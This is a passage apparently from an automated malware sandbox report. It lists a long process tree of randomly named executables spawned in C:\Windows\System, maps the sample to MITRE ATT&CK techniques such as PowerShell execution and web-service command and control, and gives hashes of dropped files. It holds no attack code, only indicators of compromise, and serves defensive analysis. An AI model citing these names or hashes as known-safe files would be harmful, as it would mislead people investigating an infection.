  C:\Windows\System\GfLopQB.exe
  2⤵
  PID:8968
- C:\Windows\System\TOhzCRx.exe
  C:\Windows\System\TOhzCRx.exe
  2⤵
  PID:8996
- C:\Windows\System\EqPeLlT.exe
  C:\Windows\System\EqPeLlT.exe
  2⤵
  PID:9024
- C:\Windows\System\UGsZASn.exe
  C:\Windows\System\UGsZASn.exe
  2⤵
  PID:9052
- C:\Windows\System\pHqIeGS.exe
  C:\Windows\System\pHqIeGS.exe
  2⤵
  PID:9080
- C:\Windows\System\koYSqyu.exe
  C:\Windows\System\koYSqyu.exe
  2⤵
  PID:9108
- C:\Windows\System\hiQvhHD.exe
  C:\Windows\System\hiQvhHD.exe
  2⤵
  PID:9136
- C:\Windows\System\tVwPNDE.exe
  C:\Windows\System\tVwPNDE.exe
  2⤵
  PID:9164
- C:\Windows\System\PtasFaw.exe
  C:\Windows\System\PtasFaw.exe
  2⤵
  PID:9200
- C:\Windows\System\SZcbwyx.exe
  C:\Windows\System\SZcbwyx.exe
  2⤵
  PID:8204
- C:\Windows\System\zvgkgdP.exe
  C:\Windows\System\zvgkgdP.exe
  2⤵
  PID:8264
- C:\Windows\System\knwVzDD.exe
  C:\Windows\System\knwVzDD.exe
  2⤵
  PID:8336
- C:\Windows\System\qWKPoye.exe
  C:\Windows\System\qWKPoye.exe
  2⤵
  PID:8400
- C:\Windows\System\OYClFie.exe
  C:\Windows\System\OYClFie.exe
  2⤵
  PID:8460
- C:\Windows\System\LMQqBEP.exe
  C:\Windows\System\LMQqBEP.exe
  2⤵
  PID:8532
- C:\Windows\System\NsGRaXJ.exe
  C:\Windows\System\NsGRaXJ.exe
  2⤵
  PID:8596
- C:\Windows\System\uRjTYqr.exe
  C:\Windows\System\uRjTYqr.exe
  2⤵
  PID:8656
- C:\Windows\System\aUQtVkC.exe
  C:\Windows\System\aUQtVkC.exe
  2⤵
  PID:8732
- C:\Windows\System\QvwHHye.exe
  C:\Windows\System\QvwHHye.exe
  2⤵
  PID:8784
- C:\Windows\System\xCzQazg.exe
  C:\Windows\System\xCzQazg.exe
  2⤵
  PID:8852
- C:\Windows\System\IwlMCaq.exe
  C:\Windows\System\IwlMCaq.exe
  2⤵
  PID:8924
- C:\Windows\System\xbKjWGo.exe
  C:\Windows\System\xbKjWGo.exe
  2⤵
  PID:8988
- C:\Windows\System\JzeaTDi.exe
  C:\Windows\System\JzeaTDi.exe
  2⤵
  PID:9048
- C:\Windows\System\SsIeipd.exe
  C:\Windows\System\SsIeipd.exe
  2⤵
  PID:9100
- C:\Windows\System\jYWkEVD.exe
  C:\Windows\System\jYWkEVD.exe
  2⤵
  PID:9184
- C:\Windows\System\wXbgpXA.exe
  C:\Windows\System\wXbgpXA.exe
  2⤵
  PID:8256
- C:\Windows\System\wPNqTen.exe
  C:\Windows\System\wPNqTen.exe
  2⤵
  PID:8396
- C:\Windows\System\Qffjeab.exe
  C:\Windows\System\Qffjeab.exe
  2⤵
  PID:8560
- C:\Windows\System\wsiWJjK.exe
  C:\Windows\System\wsiWJjK.exe
  2⤵
  PID:8712
- C:\Windows\System\OdpOxzN.exe
  C:\Windows\System\OdpOxzN.exe
  2⤵
  PID:8848
- C:\Windows\System\nkJhJHA.exe
  C:\Windows\System\nkJhJHA.exe
  2⤵
  PID:9016
- C:\Windows\System\XLIVmah.exe
  C:\Windows\System\XLIVmah.exe
  2⤵
  PID:7396
- C:\Windows\System\WnVWJHG.exe
  C:\Windows\System\WnVWJHG.exe
  2⤵
  PID:8448
- C:\Windows\System\DBGsjZw.exe
  C:\Windows\System\DBGsjZw.exe
  2⤵
  PID:8764
- C:\Windows\System\LyeMvue.exe
  C:\Windows\System\LyeMvue.exe
  2⤵
  PID:9076
- C:\Windows\System\voiNBND.exe
  C:\Windows\System\voiNBND.exe
  2⤵
  PID:1852
- C:\Windows\System\gPfxpid.exe
  C:\Windows\System\gPfxpid.exe
  2⤵
  PID:3380
- C:\Windows\System\tozwgIV.exe
  C:\Windows\System\tozwgIV.exe
  2⤵
  PID:7836
- C:\Windows\System\TqVQYPe.exe
  C:\Windows\System\TqVQYPe.exe
  2⤵
  PID:8652
- C:\Windows\System\LsvLJnE.exe
  C:\Windows\System\LsvLJnE.exe
  2⤵
  PID:2468
- C:\Windows\System\jLLGbJp.exe
  C:\Windows\System\jLLGbJp.exe
  2⤵
  PID:8316
- C:\Windows\System\NzWOWcU.exe
  C:\Windows\System\NzWOWcU.exe
  2⤵
  PID:836
- C:\Windows\System\GzzatPA.exe
  C:\Windows\System\GzzatPA.exe
  2⤵
  PID:9224
- C:\Windows\System\QkAfysR.exe
  C:\Windows\System\QkAfysR.exe
  2⤵
  PID:9252
- C:\Windows\System\zkEksgx.exe
  C:\Windows\System\zkEksgx.exe
  2⤵
  PID:9288
- C:\Windows\System\cckdNKK.exe
  C:\Windows\System\cckdNKK.exe
  2⤵
  PID:9340
- C:\Windows\System\mFAksuy.exe
  C:\Windows\System\mFAksuy.exe
  2⤵
  PID:9372
- C:\Windows\System\SzzZtyR.exe
  C:\Windows\System\SzzZtyR.exe
  2⤵
  PID:9400
- C:\Windows\System\mkTCJtp.exe
  C:\Windows\System\mkTCJtp.exe
  2⤵
  PID:9428
- C:\Windows\System\DBuKIyR.exe
  C:\Windows\System\DBuKIyR.exe
  2⤵
  PID:9456
- C:\Windows\System\wyxeUyb.exe
  C:\Windows\System\wyxeUyb.exe
  2⤵
  PID:9484
- C:\Windows\System\mEHrlmB.exe
  C:\Windows\System\mEHrlmB.exe
  2⤵
  PID:9512
- C:\Windows\System\eFtNLcH.exe
  C:\Windows\System\eFtNLcH.exe
  2⤵
  PID:9540
- C:\Windows\System\MJOUfNk.exe
  C:\Windows\System\MJOUfNk.exe
  2⤵
  PID:9568
- C:\Windows\System\KiqRjTv.exe
  C:\Windows\System\KiqRjTv.exe
  2⤵
  PID:9596
- C:\Windows\System\jYLotXI.exe
  C:\Windows\System\jYLotXI.exe
  2⤵
  PID:9624
- C:\Windows\System\vyYBvBS.exe
  C:\Windows\System\vyYBvBS.exe
  2⤵
  PID:9652
- C:\Windows\System\nIVeZVv.exe
  C:\Windows\System\nIVeZVv.exe
  2⤵
  PID:9680
- C:\Windows\System\ZjFlwsU.exe
  C:\Windows\System\ZjFlwsU.exe
  2⤵
  PID:9708
- C:\Windows\System\wcPZffo.exe
  C:\Windows\System\wcPZffo.exe
  2⤵
  PID:9736
- C:\Windows\System\dfcoUXZ.exe
  C:\Windows\System\dfcoUXZ.exe
  2⤵
  PID:9764
- C:\Windows\System\UmmhZUS.exe
  C:\Windows\System\UmmhZUS.exe
  2⤵
  PID:9792
- C:\Windows\System\BXlrATC.exe
  C:\Windows\System\BXlrATC.exe
  2⤵
  PID:9820
- C:\Windows\System\zqayxOh.exe
  C:\Windows\System\zqayxOh.exe
  2⤵
  PID:9848
- C:\Windows\System\BxnmrwS.exe
  C:\Windows\System\BxnmrwS.exe
  2⤵
  PID:9876
- C:\Windows\System\sidAzyb.exe
  C:\Windows\System\sidAzyb.exe
  2⤵
  PID:9904
- C:\Windows\System\nuHBrmt.exe
  C:\Windows\System\nuHBrmt.exe
  2⤵
  PID:9932
- C:\Windows\System\HqtUogq.exe
  C:\Windows\System\HqtUogq.exe
  2⤵
  PID:9960
- C:\Windows\System\hMtOCRw.exe
  C:\Windows\System\hMtOCRw.exe
  2⤵
  PID:9988
- C:\Windows\System\CWOETPj.exe
  C:\Windows\System\CWOETPj.exe
  2⤵
  PID:10016
- C:\Windows\System\kQFXZfr.exe
  C:\Windows\System\kQFXZfr.exe
  2⤵
  PID:10044
- C:\Windows\System\nevSRMk.exe
  C:\Windows\System\nevSRMk.exe
  2⤵
  PID:10072
- C:\Windows\System\CVLEVNs.exe
  C:\Windows\System\CVLEVNs.exe
  2⤵
  PID:10100
- C:\Windows\System\YZspvom.exe
  C:\Windows\System\YZspvom.exe
  2⤵
  PID:10128
- C:\Windows\System\Psxnbuy.exe
  C:\Windows\System\Psxnbuy.exe
  2⤵
  PID:10156
- C:\Windows\System\lhRmuzX.exe
  C:\Windows\System\lhRmuzX.exe
  2⤵
  PID:10184
- C:\Windows\System\gnyqMkc.exe
  C:\Windows\System\gnyqMkc.exe
  2⤵
  PID:10212
- C:\Windows\System\JZumafI.exe
  C:\Windows\System\JZumafI.exe
  2⤵
  PID:1332
- C:\Windows\System\BaNoRYz.exe
  C:\Windows\System\BaNoRYz.exe
  2⤵
  PID:9280
- C:\Windows\System\BGLpZCq.exe
  C:\Windows\System\BGLpZCq.exe
  2⤵
  PID:9364
- C:\Windows\System\guCczrA.exe
  C:\Windows\System\guCczrA.exe
  2⤵
  PID:9424
- C:\Windows\System\PcwJJqb.exe
  C:\Windows\System\PcwJJqb.exe
  2⤵
  PID:9496
- C:\Windows\System\qTvRsAe.exe
  C:\Windows\System\qTvRsAe.exe
  2⤵
  PID:9564
- C:\Windows\System\dHFnBjD.exe
  C:\Windows\System\dHFnBjD.exe
  2⤵
  PID:9636
- C:\Windows\System\cFWtmar.exe
  C:\Windows\System\cFWtmar.exe
  2⤵
  PID:9672
- C:\Windows\System\pVzsoAj.exe
  C:\Windows\System\pVzsoAj.exe
  2⤵
  PID:9760
- C:\Windows\System\AeLtZck.exe
  C:\Windows\System\AeLtZck.exe
  2⤵
  PID:9832
- C:\Windows\System\zNJszXW.exe
  C:\Windows\System\zNJszXW.exe
  2⤵
  PID:9176
- C:\Windows\System\wHMPMoA.exe
  C:\Windows\System\wHMPMoA.exe
  2⤵
  PID:9952
- C:\Windows\System\FeiNqZb.exe
  C:\Windows\System\FeiNqZb.exe
  2⤵
  PID:10012
- C:\Windows\System\sJFOgFU.exe
  C:\Windows\System\sJFOgFU.exe
  2⤵
  PID:10084
- C:\Windows\System\HjKlSML.exe
  C:\Windows\System\HjKlSML.exe
  2⤵
  PID:10148
- C:\Windows\System\GJWsYWy.exe
  C:\Windows\System\GJWsYWy.exe
  2⤵
  PID:10208
- C:\Windows\System\KaDFdQX.exe
  C:\Windows\System\KaDFdQX.exe
  2⤵
  PID:9320
- C:\Windows\System\eMoPYBU.exe
  C:\Windows\System\eMoPYBU.exe
  2⤵
  PID:9480
- C:\Windows\System\DnQFzIA.exe
  C:\Windows\System\DnQFzIA.exe
  2⤵
  PID:9616
- C:\Windows\System\oQhiLWf.exe
  C:\Windows\System\oQhiLWf.exe
  2⤵
  PID:9788
- C:\Windows\System\WvpdLRG.exe
  C:\Windows\System\WvpdLRG.exe
  2⤵
  PID:9928
- C:\Windows\System\hhpUIqN.exe
  C:\Windows\System\hhpUIqN.exe
  2⤵
  PID:10064
- C:\Windows\System\ChQyFMg.exe
  C:\Windows\System\ChQyFMg.exe
  2⤵
  PID:10236
- C:\Windows\System\QbWwzFA.exe
  C:\Windows\System\QbWwzFA.exe
  2⤵
  PID:9592
- C:\Windows\System\ethwBgz.exe
  C:\Windows\System\ethwBgz.exe
  2⤵
  PID:9916
- C:\Windows\System\EqkYLeO.exe
  C:\Windows\System\EqkYLeO.exe
  2⤵
  PID:9392
- C:\Windows\System\wHcPVkE.exe
  C:\Windows\System\wHcPVkE.exe
  2⤵
  PID:10196
- C:\Windows\System\YsexFhA.exe
  C:\Windows\System\YsexFhA.exe
  2⤵
  PID:10248
- C:\Windows\System\XnuPvzz.exe
  C:\Windows\System\XnuPvzz.exe
  2⤵
  PID:10276
- C:\Windows\System\jRuYeTm.exe
  C:\Windows\System\jRuYeTm.exe
  2⤵
  PID:10304
- C:\Windows\System\DkIRlrg.exe
  C:\Windows\System\DkIRlrg.exe
  2⤵
  PID:10332
- C:\Windows\System\XOmnPxT.exe
  C:\Windows\System\XOmnPxT.exe
  2⤵
  PID:10360
- C:\Windows\System\simOncT.exe
  C:\Windows\System\simOncT.exe
  2⤵
  PID:10388
- C:\Windows\System\DXWksCj.exe
  C:\Windows\System\DXWksCj.exe
  2⤵
  PID:10416
- C:\Windows\System\feZwujR.exe
  C:\Windows\System\feZwujR.exe
  2⤵
  PID:10444
- C:\Windows\System\zUmJkBc.exe
  C:\Windows\System\zUmJkBc.exe
  2⤵
  PID:10472
- C:\Windows\System\emGKLTq.exe
  C:\Windows\System\emGKLTq.exe
  2⤵
  PID:10488
- C:\Windows\System\ZCAtGLg.exe
  C:\Windows\System\ZCAtGLg.exe
  2⤵
  PID:10528
- C:\Windows\System\qdGYFHq.exe
  C:\Windows\System\qdGYFHq.exe
  2⤵
  PID:10556
- C:\Windows\System\mKKxHEO.exe
  C:\Windows\System\mKKxHEO.exe
  2⤵
  PID:10584
- C:\Windows\System\jBvTqqT.exe
  C:\Windows\System\jBvTqqT.exe
  2⤵
  PID:10612
- C:\Windows\System\POGJUea.exe
  C:\Windows\System\POGJUea.exe
  2⤵
  PID:10640
- C:\Windows\System\egboLtS.exe
  C:\Windows\System\egboLtS.exe
  2⤵
  PID:10668
- C:\Windows\System\hWFLNZZ.exe
  C:\Windows\System\hWFLNZZ.exe
  2⤵
  PID:10696
- C:\Windows\System\IStpYzP.exe
  C:\Windows\System\IStpYzP.exe
  2⤵
  PID:10724
- C:\Windows\System\iGXErhI.exe
  C:\Windows\System\iGXErhI.exe
  2⤵
  PID:10760
- C:\Windows\System\ZJNsGdf.exe
  C:\Windows\System\ZJNsGdf.exe
  2⤵
  PID:10780
- C:\Windows\System\eRfqlUC.exe
  C:\Windows\System\eRfqlUC.exe
  2⤵
  PID:10808
- C:\Windows\System\hLNIkqn.exe
  C:\Windows\System\hLNIkqn.exe
  2⤵
  PID:10836
- C:\Windows\System\wiUTYlP.exe
  C:\Windows\System\wiUTYlP.exe
  2⤵
  PID:10864
- C:\Windows\System\XnAuoNe.exe
  C:\Windows\System\XnAuoNe.exe
  2⤵
  PID:10892
- C:\Windows\System\KsyqZrT.exe
  C:\Windows\System\KsyqZrT.exe
  2⤵
  PID:10920
- C:\Windows\System\JVnlfio.exe
  C:\Windows\System\JVnlfio.exe
  2⤵
  PID:10948
- C:\Windows\System\lkiawyJ.exe
  C:\Windows\System\lkiawyJ.exe
  2⤵
  PID:10976
- C:\Windows\System\WLDrylh.exe
  C:\Windows\System\WLDrylh.exe
  2⤵
  PID:11004
- C:\Windows\System\QIVEcAB.exe
  C:\Windows\System\QIVEcAB.exe
  2⤵
  PID:11032
- C:\Windows\System\RxAclHh.exe
  C:\Windows\System\RxAclHh.exe
  2⤵
  PID:11060
- C:\Windows\System\Dnjgyta.exe
  C:\Windows\System\Dnjgyta.exe
  2⤵
  PID:11088
- C:\Windows\System\PAEHRNR.exe
  C:\Windows\System\PAEHRNR.exe
  2⤵
  PID:11116
- C:\Windows\System\wPrnBfR.exe
  C:\Windows\System\wPrnBfR.exe
  2⤵
  PID:11144
- C:\Windows\System\itUkZfe.exe
  C:\Windows\System\itUkZfe.exe
  2⤵
  PID:11172
- C:\Windows\System\OblFaky.exe
  C:\Windows\System\OblFaky.exe
  2⤵
  PID:11200
- C:\Windows\System\qfUEnUl.exe
  C:\Windows\System\qfUEnUl.exe
  2⤵
  PID:11228
- C:\Windows\System\ymjNWkF.exe
  C:\Windows\System\ymjNWkF.exe
  2⤵
  PID:11256
- C:\Windows\System\FgVxiTn.exe
  C:\Windows\System\FgVxiTn.exe
  2⤵
  PID:10288
- C:\Windows\System\aAYCeaq.exe
  C:\Windows\System\aAYCeaq.exe
  2⤵
  PID:10352
- C:\Windows\System\baaIwxY.exe
  C:\Windows\System\baaIwxY.exe
  2⤵
  PID:10412
- C:\Windows\System\kyAVikH.exe
  C:\Windows\System\kyAVikH.exe
  2⤵
  PID:10480
- C:\Windows\System\YbeWLWj.exe
  C:\Windows\System\YbeWLWj.exe
  2⤵
  PID:10552
- C:\Windows\System\miJGqBb.exe
  C:\Windows\System\miJGqBb.exe
  2⤵
  PID:10624
- C:\Windows\System\ZtcGipe.exe
  C:\Windows\System\ZtcGipe.exe
  2⤵
  PID:10716
- C:\Windows\System\JuDTczc.exe
  C:\Windows\System\JuDTczc.exe
  2⤵
  PID:10748
- C:\Windows\System\rxkVrNH.exe
  C:\Windows\System\rxkVrNH.exe
  2⤵
  PID:10820
- C:\Windows\System\XcilqmC.exe
  C:\Windows\System\XcilqmC.exe
  2⤵
  PID:10888
- C:\Windows\System\BPRRkJc.exe
  C:\Windows\System\BPRRkJc.exe
  2⤵
  PID:10944
- C:\Windows\System\zcGQsmR.exe
  C:\Windows\System\zcGQsmR.exe
  2⤵
  PID:11016
- C:\Windows\System\qJiaKct.exe
  C:\Windows\System\qJiaKct.exe
  2⤵
  PID:11080
- C:\Windows\System\iCxctBP.exe
  C:\Windows\System\iCxctBP.exe
  2⤵
  PID:11140
- C:\Windows\System\ajHMoRa.exe
  C:\Windows\System\ajHMoRa.exe
  2⤵
  PID:11184
- C:\Windows\System\YYDuZqK.exe
  C:\Windows\System\YYDuZqK.exe
  2⤵
  PID:10268
- C:\Windows\System\NYsweEH.exe
  C:\Windows\System\NYsweEH.exe
  2⤵
  PID:10408
- C:\Windows\System\geAhZkL.exe
  C:\Windows\System\geAhZkL.exe
  2⤵
  PID:10580
- C:\Windows\System\sEsFNJs.exe
  C:\Windows\System\sEsFNJs.exe
  2⤵
  PID:10736
- C:\Windows\System\oerMNiV.exe
  C:\Windows\System\oerMNiV.exe
  2⤵
  PID:10884
- C:\Windows\System\tcBaSDn.exe
  C:\Windows\System\tcBaSDn.exe
  2⤵
  PID:11044
- C:\Windows\System\uigDMmi.exe
  C:\Windows\System\uigDMmi.exe
  2⤵
  PID:11168
- C:\Windows\System\ldmQQRx.exe
  C:\Windows\System\ldmQQRx.exe
  2⤵
  PID:10400
- C:\Windows\System\PzLleaj.exe
  C:\Windows\System\PzLleaj.exe
  2⤵
  PID:10800
- C:\Windows\System\wbKZvFO.exe
  C:\Windows\System\wbKZvFO.exe
  2⤵
  PID:11164
- C:\Windows\System\tKpiUPF.exe
  C:\Windows\System\tKpiUPF.exe
  2⤵
  PID:10680
- C:\Windows\System\Tslxetm.exe
  C:\Windows\System\Tslxetm.exe
  2⤵
  PID:11108
- C:\Windows\System\nybMfKc.exe
  C:\Windows\System\nybMfKc.exe
  2⤵
  PID:11284
- C:\Windows\System\lyPpOwQ.exe
  C:\Windows\System\lyPpOwQ.exe
  2⤵
  PID:11312
- C:\Windows\System\zpsVzOc.exe
  C:\Windows\System\zpsVzOc.exe
  2⤵
  PID:11340
- C:\Windows\System\ivVvxfi.exe
  C:\Windows\System\ivVvxfi.exe
  2⤵
  PID:11368
- C:\Windows\System\zMuLYks.exe
  C:\Windows\System\zMuLYks.exe
  2⤵
  PID:11396
- C:\Windows\System\SCjdeCN.exe
  C:\Windows\System\SCjdeCN.exe
  2⤵
  PID:11424
- C:\Windows\System\lZaMvdU.exe
  C:\Windows\System\lZaMvdU.exe
  2⤵
  PID:11452
- C:\Windows\System\mHGeIMJ.exe
  C:\Windows\System\mHGeIMJ.exe
  2⤵
  PID:11480
- C:\Windows\System\annDsWP.exe
  C:\Windows\System\annDsWP.exe
  2⤵
  PID:11508
- C:\Windows\System\lvGLUZi.exe
  C:\Windows\System\lvGLUZi.exe
  2⤵
  PID:11536
- C:\Windows\System\ovFHIQl.exe
  C:\Windows\System\ovFHIQl.exe
  2⤵
  PID:11564
- C:\Windows\System\CyJisZi.exe
  C:\Windows\System\CyJisZi.exe
  2⤵
  PID:11592
- C:\Windows\System\TzABKCt.exe
  C:\Windows\System\TzABKCt.exe
  2⤵
  PID:11620
- C:\Windows\System\AcvFsLT.exe
  C:\Windows\System\AcvFsLT.exe
  2⤵
  PID:11648
- C:\Windows\System\AuGavrP.exe
  C:\Windows\System\AuGavrP.exe
  2⤵
  PID:11676
- C:\Windows\System\QZHOMXw.exe
  C:\Windows\System\QZHOMXw.exe
  2⤵
  PID:11716
- C:\Windows\System\VIsMjSJ.exe
  C:\Windows\System\VIsMjSJ.exe
  2⤵
  PID:11732
- C:\Windows\System\RhVAUPv.exe
  C:\Windows\System\RhVAUPv.exe
  2⤵
  PID:11772
- C:\Windows\System\aPlWaHt.exe
  C:\Windows\System\aPlWaHt.exe
  2⤵
  PID:11820
- C:\Windows\System\mjNLfkO.exe
  C:\Windows\System\mjNLfkO.exe
  2⤵
  PID:11880
- C:\Windows\System\yWvFdPR.exe
  C:\Windows\System\yWvFdPR.exe
  2⤵
  PID:11904
- C:\Windows\System\dacliox.exe
  C:\Windows\System\dacliox.exe
  2⤵
  PID:11940
- C:\Windows\System\zZpYqNo.exe
  C:\Windows\System\zZpYqNo.exe
  2⤵
  PID:11996
- C:\Windows\System\Gdltwsx.exe
  C:\Windows\System\Gdltwsx.exe
  2⤵
  PID:12012
- C:\Windows\System\ClxGLLq.exe
  C:\Windows\System\ClxGLLq.exe
  2⤵
  PID:12032
- C:\Windows\System\lMlXYjl.exe
  C:\Windows\System\lMlXYjl.exe
  2⤵
  PID:12072
- C:\Windows\System\wnYKtGW.exe
  C:\Windows\System\wnYKtGW.exe
  2⤵
  PID:12116
- C:\Windows\System\FvWbRfj.exe
  C:\Windows\System\FvWbRfj.exe
  2⤵
  PID:12156
- C:\Windows\System\IojbwOV.exe
  C:\Windows\System\IojbwOV.exe
  2⤵
  PID:12184
- C:\Windows\System\fqIXfLV.exe
  C:\Windows\System\fqIXfLV.exe
  2⤵
  PID:12204
- C:\Windows\System\Wseyush.exe
  C:\Windows\System\Wseyush.exe
  2⤵
  PID:12220
- C:\Windows\System\trVDmFv.exe
  C:\Windows\System\trVDmFv.exe
  2⤵
  PID:12236
- C:\Windows\System\EqCAlZU.exe
  C:\Windows\System\EqCAlZU.exe
  2⤵
  PID:12252
- C:\Windows\System\QQiwJZZ.exe
  C:\Windows\System\QQiwJZZ.exe
  2⤵
  PID:12276
- C:\Windows\System\rjhVxFc.exe
  C:\Windows\System\rjhVxFc.exe
  2⤵
  PID:11304
- C:\Windows\System\PMLzaoT.exe
  C:\Windows\System\PMLzaoT.exe
  2⤵
  PID:11408
- C:\Windows\System\lGpdupG.exe
  C:\Windows\System\lGpdupG.exe
  2⤵
  PID:11520
- C:\Windows\System\YkbQjOo.exe
  C:\Windows\System\YkbQjOo.exe
  2⤵
  PID:11632
- C:\Windows\System\oagduRF.exe
  C:\Windows\System\oagduRF.exe
  2⤵
  PID:11696
- C:\Windows\System\LQplEMI.exe
  C:\Windows\System\LQplEMI.exe
  2⤵
  PID:11792
- C:\Windows\System\RrdgRsv.exe
  C:\Windows\System\RrdgRsv.exe
  2⤵
  PID:3312
- C:\Windows\System\hmRbDUW.exe
  C:\Windows\System\hmRbDUW.exe
  2⤵
  PID:11876
- C:\Windows\System\txGGsaN.exe
  C:\Windows\System\txGGsaN.exe
  2⤵
  PID:11952
- C:\Windows\System\JOlqScj.exe
  C:\Windows\System\JOlqScj.exe
  2⤵
  PID:12008
- C:\Windows\System\hPqKruo.exe
  C:\Windows\System\hPqKruo.exe
  2⤵
  PID:12100
- C:\Windows\System\reHXaqX.exe
  C:\Windows\System\reHXaqX.exe
  2⤵
  PID:12176
- C:\Windows\System\eRZKISA.exe
  C:\Windows\System\eRZKISA.exe
  2⤵
  PID:12264
- C:\Windows\System\enJMyOz.exe
  C:\Windows\System\enJMyOz.exe
  2⤵
  PID:11324
- C:\Windows\System\UHvpQMo.exe
  C:\Windows\System\UHvpQMo.exe
  2⤵
  PID:11476
- C:\Windows\System\XDPszRy.exe
  C:\Windows\System\XDPszRy.exe
  2⤵
  PID:11612
- C:\Windows\System\ePBRKUu.exe
  C:\Windows\System\ePBRKUu.exe
  2⤵
  PID:11764
- C:\Windows\System\yyNMkSc.exe
  C:\Windows\System\yyNMkSc.exe
  2⤵
  PID:11864
- C:\Windows\System\HgqurER.exe
  C:\Windows\System\HgqurER.exe
  2⤵
  PID:11972
- C:\Windows\System\JfJVqfz.exe
  C:\Windows\System\JfJVqfz.exe
  2⤵
  PID:12152
- C:\Windows\System\DpBYMVW.exe
  C:\Windows\System\DpBYMVW.exe
  2⤵
  PID:11388
- C:\Windows\System\wnWPeFO.exe
  C:\Windows\System\wnWPeFO.exe
  2⤵
  PID:11668
- C:\Windows\System\nNphYRI.exe
  C:\Windows\System\nNphYRI.exe
  2⤵
  PID:11920
- C:\Windows\System\nFKdebf.exe
  C:\Windows\System\nFKdebf.exe
  2⤵
  PID:11836
- C:\Windows\System\NYakxmT.exe
  C:\Windows\System\NYakxmT.exe
  2⤵
  PID:12300
- C:\Windows\System\gdqCZsc.exe
  C:\Windows\System\gdqCZsc.exe
  2⤵
  PID:12328
- C:\Windows\System\LCJGrMw.exe
  C:\Windows\System\LCJGrMw.exe
  2⤵
  PID:12352
- C:\Windows\System\NGeiFwq.exe
  C:\Windows\System\NGeiFwq.exe
  2⤵
  PID:12384
- C:\Windows\System\WeeEqdC.exe
  C:\Windows\System\WeeEqdC.exe
  2⤵
  PID:12412
- C:\Windows\System\cOaqiSQ.exe
  C:\Windows\System\cOaqiSQ.exe
  2⤵
  PID:12440
- C:\Windows\System\oKAstCt.exe
  C:\Windows\System\oKAstCt.exe
  2⤵
  PID:12468
- C:\Windows\System\LVunvih.exe
  C:\Windows\System\LVunvih.exe
  2⤵
  PID:12492
- C:\Windows\System\ZyJpoxc.exe
  C:\Windows\System\ZyJpoxc.exe
  2⤵
  PID:12524
- C:\Windows\System\yWTmvCn.exe
  C:\Windows\System\yWTmvCn.exe
  2⤵
  PID:12548
- C:\Windows\System\rtesgMv.exe
  C:\Windows\System\rtesgMv.exe
  2⤵
  PID:12568
- C:\Windows\System\OvTGNEo.exe
  C:\Windows\System\OvTGNEo.exe
  2⤵
  PID:12608
- C:\Windows\System\HaCBElw.exe
  C:\Windows\System\HaCBElw.exe
  2⤵
  PID:12632
- C:\Windows\System\LBvfNtr.exe
  C:\Windows\System\LBvfNtr.exe
  2⤵
  PID:12652
- C:\Windows\System\PvsHPWj.exe
  C:\Windows\System\PvsHPWj.exe
  2⤵
  PID:12684
- C:\Windows\System\UUblPFd.exe
  C:\Windows\System\UUblPFd.exe
  2⤵
  PID:12720
- C:\Windows\System\ttKImdo.exe
  C:\Windows\System\ttKImdo.exe
  2⤵
  PID:12748
- C:\Windows\System\mXPkwZB.exe
  C:\Windows\System\mXPkwZB.exe
  2⤵
  PID:12776
- C:\Windows\System\UrXKHaS.exe
  C:\Windows\System\UrXKHaS.exe
  2⤵
  PID:12804
- C:\Windows\System\zMGZDMU.exe
  C:\Windows\System\zMGZDMU.exe
  2⤵
  PID:12820
- C:\Windows\System\lOszQiM.exe
  C:\Windows\System\lOszQiM.exe
  2⤵
  PID:12852
- C:\Windows\System\bcuvREU.exe
  C:\Windows\System\bcuvREU.exe
  2⤵
  PID:12872
- C:\Windows\System\QLyrZhX.exe
  C:\Windows\System\QLyrZhX.exe
  2⤵
  PID:12892
- C:\Windows\System\mDzhDJh.exe
  C:\Windows\System\mDzhDJh.exe
  2⤵
  PID:12916
- C:\Windows\System\nCJbhHX.exe
  C:\Windows\System\nCJbhHX.exe
  2⤵
  PID:12948
- C:\Windows\System\IIBnKIY.exe
  C:\Windows\System\IIBnKIY.exe
  2⤵
  PID:12988
- C:\Windows\System\GwYwHoU.exe
  C:\Windows\System\GwYwHoU.exe
  2⤵
  PID:13020
- C:\Windows\System\GHaelBZ.exe
  C:\Windows\System\GHaelBZ.exe
  2⤵
  PID:13044
- C:\Windows\System\FzjZfbI.exe
  C:\Windows\System\FzjZfbI.exe
  2⤵
  PID:13076
- C:\Windows\System\mdtWcey.exe
  C:\Windows\System\mdtWcey.exe
  2⤵
  PID:13104
- C:\Windows\System\PLCwCCJ.exe
  C:\Windows\System\PLCwCCJ.exe
  2⤵
  PID:13144
- C:\Windows\System\uvNSoNd.exe
  C:\Windows\System\uvNSoNd.exe
  2⤵
  PID:13172
- C:\Windows\System\agJlGiI.exe
  C:\Windows\System\agJlGiI.exe
  2⤵
  PID:13200
- C:\Windows\System\QPiAzmM.exe
  C:\Windows\System\QPiAzmM.exe
  2⤵
  PID:13228
- C:\Windows\System\YbxKvxM.exe
  C:\Windows\System\YbxKvxM.exe
  2⤵
  PID:13248
- C:\Windows\System\GgAxlnV.exe
  C:\Windows\System\GgAxlnV.exe
  2⤵
  PID:13300
- C:\Windows\System\ZmOUYpq.exe
  C:\Windows\System\ZmOUYpq.exe
  2⤵
  PID:12212
- C:\Windows\System\xcwxiGq.exe
  C:\Windows\System\xcwxiGq.exe
  2⤵
  PID:12336
- C:\Windows\System\mrQUqPX.exe
  C:\Windows\System\mrQUqPX.exe
  2⤵
  PID:12424
- C:\Windows\System\irhVMsU.exe
  C:\Windows\System\irhVMsU.exe
  2⤵
  PID:12460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_goejh4yb.sbl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\AcwiYAF.exe

Filesize
2.8MB

MD5
9bcb2e1f96db59d74ef1bf2f055ff44d

SHA1
44063d326414086627ddd4fcf1326fe20082bb2f

SHA256
1d8d9d80215eccd0eca1727d3c2f7690061fb82c1b0e435ddd3197117bb78ace

SHA512
